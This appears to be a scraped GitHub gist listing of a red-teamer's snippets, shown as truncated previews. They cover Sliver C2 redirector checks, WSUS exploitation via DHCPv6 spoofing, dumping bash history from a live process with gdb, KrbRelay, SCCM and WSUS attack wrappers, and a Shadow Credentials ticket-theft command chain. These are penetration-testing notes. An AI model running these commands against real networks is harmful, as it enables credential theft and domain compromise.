zimnyaa
/ sliver-redir.py
Last active
December 23, 2022 20:17
Check live beacon URIs, certificate expiry dates and redirectors with sliver-py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from rich.console import Console | |
| from rich.tree import Tree | |
| from rich.markdown import Markdown | |
| import os, asyncio | |
| import time | |
| from datetime import datetime | |
| import sliver, OpenSSL, ssl, urllib.parse | |
| from datetime import datetime | |
| console = Console() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from rich.console import Console | |
| from rich.text import Text | |
| from rich.table import Table, Column | |
| from rich.markdown import Markdown | |
| import os, asyncio | |
| import time | |
| from datetime import datetime | |
| import sliver | |
| console = Console() |
zimnyaa
/ pretender-wsus.sh
Created
October 10, 2022 12:33
Cleartext WSUS exploitation with DHCPv6 spoofing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # checking WSUS preferenses | |
| PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer | |
| PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer | |
| ### after setting up the attack click "Check for updates" button | |
| ### set up DHCPv6 spoofing | |
| git clone https://github.com/RedTeamPentesting/pretender.git | |
| cd pretender | |
| sudo ./pretender -i eth0 --spoof wsus.lab.local | |
| ### setting up the IPv6 PyWSUS fork | |
| git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git |
zimnyaa
/ find-preload-candidates.sh
Created
June 11, 2022 11:25
A simple bash oneliner to hunt for suitable LD_PRELOAD candidates on Linux.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo 'connections';netstat -tp 2>/dev/null|grep tcp|awk '{print $7}'|cut -d '/' -f 2|uniq -c;echo 'processes';ps aux|grep -v "\\["|awk '{print $11}'|uniq -c|sort -r|head -n 5 |
zimnyaa
/ dump-history.sh
Last active
August 18, 2022 15:01
Dump history from a running bash process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Effectively trigger history -a: | |
| $ gdb -p PID -batch -ex 'call maybe_append_history(get_string_value("HISTFILE"))' | |
| #Dump the last 10 history entries to your local terminal (pty) | |
| $ gdb -p PID -batch -ex 'call append_history(10, "'$(tty)'")' | |
| #Backup the entire history to a temporary file: | |
| $ gdb -p PID -batch -ex 'call write_history("/tmp/history-backup.txt")' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-KrbRelay | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "" | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MalSCCM | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "" | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SharpWSUS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "" | |
| ) |
zimnyaa
/ peas-gpo.py
Last active
January 11, 2023 23:58
Enumerate GPO scripts from Exchange with F-Secure/PEAS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import peas | |
| client = peas.Peas() | |
| client.disable_certificate_verification() | |
| #### V CONFIG SECTION V #### | |
| client.set_creds({ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # getting the current ticket | |
| sliver (SESSION) > rubeus tgtdeleg /nowrap | |
| echo <ticket> | base64 --decode > ticket.kirbi | |
| ticketConverter.py ticket.kirbi ticket.ccache | |
| # adding ms-KeyCredentialLink | |
| proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert | |
| # requesting a ticket with ShadowCredentials | |
| proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache |